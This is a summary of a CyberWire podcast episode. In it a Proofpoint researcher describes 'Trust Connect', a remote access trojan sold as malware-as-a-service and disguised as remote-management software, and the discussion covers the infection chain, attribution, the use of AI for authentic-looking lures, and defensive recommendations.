![A wolf in admin clothing. [Research Saturday] - CyberWire Daily cover](/_next/image?url=https%3A%2F%2Fmegaphone.imgix.net%2Fpodcasts%2F02cbf76a-3507-11f1-86dc-3fe18a6ed822%2Fimage%2F95b72a93c2ffaf8ff900d662a9bd3735.png%3Fixlib%3Drails-4.3.1%26max-w%3D3000%26max-h%3D3000%26fit%3Dcrop%26auto%3Dformat%2Ccompress&w=1920&q=75)
CyberWire Daily – Research Saturday (April 11, 2026)
Episode: A wolf in admin clothing.
Overview
This Research Saturday edition examines a threat actor's use of fake remote monitoring and management (RMM) software, dubbed "Trust Connect," to conduct social engineering and deploy malware. Host Dave Bittner interviews Selina Larson, threat researcher from Proofpoint, about their report “Don’t Trust Connect. It’s a RAT in an RMM hat.” The discussion covers the technical and psychological tactics used to compromise organizations, the ecosystem of RMM abuse, indicators of compromise, AI’s role, and lessons for defenders.
Key Discussion Points and Insights
1. What is 'Trust Connect'?
-
Fake RMM as Malware:
- "Ultimately what we identified was it's this fake RMM. It's a malware remote access trojan that's masquerading as a remote monitoring and management tool." – Selina Larson [01:24]
- Legitimate Facade: Website appears authentic with customer testimonials, branding, and even an extended validation certificate, yet serves malware.
-
Vibe-coded, AI-generated Design:
- The website is likely AI-generated—“totally vibe coded”—and aims to appear trustworthy but demonstrates superficial, rather than deep, web security expertise. [01:24–03:50]
- Security Flaws: Exposed code and lack of proper access controls revealed more than intended:
- "It turns out you might be a good malware developer, but a terrible web developer. Different skillset. AI doesn’t immediately make you great at everything." – Selina Larson [04:47]
2. How Does the Infection Chain Work?
- Email-Based Delivery:
- "This tool [malware] being delivered via email... campaigns delivering multiple different RMMs alongside Trust Connect..." [05:09]
- Common Lures:
- Email subjects reference documents, party invites, Teams messages, or even Social Security info, to lower suspicions.
- Download & Execution:
- Victims are encouraged to download and run an executable, thinking it's a legitimate RMM, which actually is a remote access Trojan (RAT). [06:34]
- Post-Infection:
- Allows data theft, account takeover, further malware installation, and lateral movement within a network. [06:38]
3. The Wider Ecosystem of RMM Abuse
- Blending Malicious and Legitimate Tools:
- Threat actors often use actual RMM tools maliciously because they're readily accepted in workplace environments and rarely on blocklists. [07:21]
- Tool Chaining and Evolutions:
- Sometimes campaigns begin with legitimate RMMs (e.g., Screen Connect, Datto, LogMeIn) and then expose users to Trust Connect.
- Extended Validation certificates add a false sense of legitimacy.
4. Professionalism and Functionality of Trust Connect's Panel
- Slick User Experience:
- Despite security flaws, the malware panel is well-designed, complete with support info and installation guides. [10:09]
- Deployment Guides:
- Step-by-step instructions for actors, including PowerShell scripts for easy deployment ("click fix" installs), Telegram bot setup for credential exfiltration, and flashy lures (Zoom, Adobe, Teams, SSA exe).
- Malware-as-a-Service Model:
- Operators license the malware to others, who conduct their own campaigns.
5. Attribution and Ties to Larger Criminal Ecosystems
- Redline Stealer Connection:
- The required point of contact, “Zaki09” on Telegram, matches a VIP customer identified in Operation Magnus, a law enforcement initiative targeting Redline users.
- "We did have some fun kind of running that down." – Selina Larson [14:07]
- Adaptability:
- After interventions (EV certificate revocation, domain takedown), the group pivoted quickly, releasing variants (like Dot Connect) with similar capabilities. [14:41]
6. Defensive Recommendations
- Indicators and Signatures Shared:
- Proofpoint contributed to the development of detection rules (Emerging Threats, ET Open signatures) for defenders. [16:15]
- Behavioral Defense Focus:
- Emphasize blocking or closely monitoring:
- Unusual executables and PowerShell usage
- Unapproved RMM domains and installs
- Social engineering techniques (e.g., realistic-looking lures, faked legitimacy)
- Emphasize blocking or closely monitoring:
- Lesson:
- Defenders should focus as much on the behaviors and techniques as on specific malware signatures.
7. AI’s Role in Social Engineering
- AI Ups the Authenticity Game:
- "I think one of the big ways that threat actors are using AI is to just make their stuff, whatever it is, look more authentic." [18:41]
- AI-Generated Artifacts Have Tells:
- Common patterns: excessive emoji use, similar site layouts (blue/purple, centered elements, rocket ship emoji).
- Limitations of AI-generated Malware:
- Functionality often still lags behind appearance; superficial flaws can expose attackers.
- "If you don’t have a base knowledge or understanding of something that you’re trying to do, it can actually be a vulnerability because you don’t know how to check if something’s secure or not." [19:32]
- Analogy:
- "When your kid's coming up, you give them a hammer and some nails... you don't start them out with a pneumatic nail gun." – Dave Bittner [21:21]
Notable Quotes & Memorable Moments
- "Trust us, it's real. We promise." (sarcastically about the site's name) – Selina Larson [02:18]
- "Turns out you might be a good malware developer, but a terrible web developer. Different skillset. AI doesn’t immediately make you great at everything." – Selina Larson [04:47]
- "Defending against the behaviors is something that can be very, very important." – Selina Larson [16:38]
- "I think of AI as just, it's a word processor for, you know, tooling... If you don't have a base knowledge or understanding, it can actually be a vulnerability..." – Selina Larson [19:32]
- "It makes me think about how... you give [kids] a hammer and some nails... but you don't start them out with a pneumatic nail gun." – Dave Bittner [21:21]
Important Timestamps (MM:SS)
- [01:24] — Intro to Trust Connect and tactic overview
- [05:09] — Walkthrough of infection chain
- [07:21] — Ecosystem of RMM abuse and why it’s effective
- [10:09] — Professionalism and structure of the malware’s user panel
- [12:27] — Attribution and Redline stealer connections
- [14:41] — Group’s ability to pivot after disruptions
- [16:15] — Defensive recommendations for organizations
- [18:41] — AI's role in social engineering and design
- [21:21] — Analogy about skilled threat use of AI and vulnerabilities
Conclusion / Takeaways
- "Trust Connect" demonstrates the increasing sophistication—yet sometimes surface-level—of AI-assisted phishing and malware campaigns.
- Social engineering is enhanced by convincingly legitimate web design, certificates, and deployment instructions, but real expertise still matters.
- Defenders must focus on behavioral indicators and known TTPs, not just static malware signatures.
- AI contributes to rapid development and better-looking campaigns, but also introduces new, exploitable errors for skilled analysts.
- The threat landscape is evolving quickly, with malware-as-a-service and adaptive, professional actors making incident response increasingly complex.
Recommended for further reading: See Proofpoint’s report “Don’t Trust Connect. It’s a RAT in an RMM hat” for technical details and indicators of compromise.
Featured Guest: Selina Larson, Threat Researcher, Proofpoint
Host: Dave Bittner, CyberWire/N2K Networks